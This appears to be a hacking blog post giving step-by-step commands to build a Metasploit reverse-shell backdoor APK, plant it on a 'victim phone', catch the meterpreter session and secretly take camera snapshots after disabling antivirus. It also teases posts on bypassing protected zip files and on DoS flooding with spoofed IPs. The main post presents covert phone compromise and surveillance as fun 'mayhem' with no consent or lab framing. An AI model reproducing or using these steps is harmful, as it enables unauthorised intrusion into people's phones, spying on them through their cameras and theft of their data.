Skip to main content

How To Hack An Android Phone By Metasploit..

In this post i will show you How To Hack An Android Phone By Metasploit.. Sounds pretty cool ha... and infact it is pretty cool.
First we need a to know What is Metasploit..??

So What is Metasploit..??

The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development.
Its best-known sub-project is the open source Metasploit Framework, a tool for developing and executing exploit code against a remote target machine. Other important sub-projects include the Opcode Database, shellcode archive and related research.
The Metasploit Project is well known for its anti-forensic and evasion tools, some of which are built into the Metasploit Framework. see more about Metasploit

Now the interesting part...Hacking what we need for this...??

1) Kali Linux OS
2)Android Phone (rooted/non-rooted both works)
That's all....

  • First you have to create a backdoor  to exploit android you can do this by running the following command at the terminal:
root@jafar:~# msfpayload android/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=4444 R > abc.apk
  •  now we have created our backdoor abc.apk. Just copy this abc.apk to a victim phone and install it. The application will be listed as Main Activity open it after Handler is been setup.
To create a Handler or Listener:-

root@jafar:~#msfconsole
root@jafar:~#use exploit/multi/handler
root@jafar:~#set payload android/meterpreter/reverse_tcp
root@jafar:~#set LHOST IP_Address (IP of your kali)
root@jafar:~#set LPORT Port_Number (take 4444 or just don't use this command)
root@jafar:~#exploit


after this open the Main Activity application in the Phone. If everything went right then a meterpreter session will start ...congo you are inside the Phone...
Use command like ps,ls or type help
Like you can take a snap from the camera secretly just type
root@jafar:~#webcam_snap

If there is a antivirus in the phone it can detect it... So just turn off the antivirus program and enjoy the mayhem.........
 




Comments

Popular posts from this blog

How to bypass a password protected zip file

  Many peoples download and  share paid files for free in internet,but they add passwords and surveys to Zip Files so that peoples can download the files easily and they can't open it without the password.So to open that file you have to follow some surveys or some other things. That's why in this post i will show you how to bypass a password protected .zip file. It's very simple and kinda a cool. STEPS :- 1. Download and install  Nullsoft Scriptable Install System (NSIS) on your Pc or Laptop by Clicking Here . 2. Open and install the NSIS and click Installer based on ZIP Files.  3. Choose the location of .ZIP File by clicking Open or Browse Button . 4. Click on Generate button after selecting .ZIP file. 5. When Zip file is generated click on Test button and install your file. 6. After installation is completed go to location of your Zip file and you will find your extracted Zip file in new folder without usi...

KALI LINUX 1.1.0

Kali Linux is a Debian-derived Linux distribution designed for digital forensics and penetration testing. It is maintained and funded by Offensive Security Ltd. It was developed by Mati Aharoni and Devon Kearns of Offensive Security through the rewrite of BackTrack,their previous forensics Linux distribution. Kali Linux is pre-installed with numerous penetration-testing programs like - nmap (a port scanner), Wireshark (a packet analyzer), John the Ripper (a password cracker), Aircrack-ng (a software suite for penetration-testing wireless LANs), Burp suite and OWASP ZAP (both web application security scanners). and lot many. Recently Mati Aharoni has announced the release of Kali Linux 1.1.0, a point release of the project's Debian-based distribution with specialist software tools for penetration testing and forensic analysis . The realease Statement: "After almost two years of public development (and another year behind the scenes), we are proud to announc...

DOS Attack By Hping 3 Tool.

In computing, a denial-of-service (DoS) or distributed denial-of-service (DDoS) attack is an attempt to make a machine or network resource unavailable to its intended users. Although the means to carry out, the motives for, and targets of a DoS attack vary, it generally consists of efforts to temporarily or indefinitely interrupt or suspend services of a host connected to the Internet. In this article I will show how to carry out a Denial-of-service Attack or DoS using hping3 with spoofed IP in Kali Linux.   If you are executing a Denial of Service attack or DoS using hping3 the main thing you can do with  this is that:-     You can hide your IP address.     Your destination machine will see source from random source IP addresses rather than yours.     Your destination machine will get overwhelmed within 5 minutes and stop responding. Sounds good? I bet it does. But before we go and start using hping3, let’...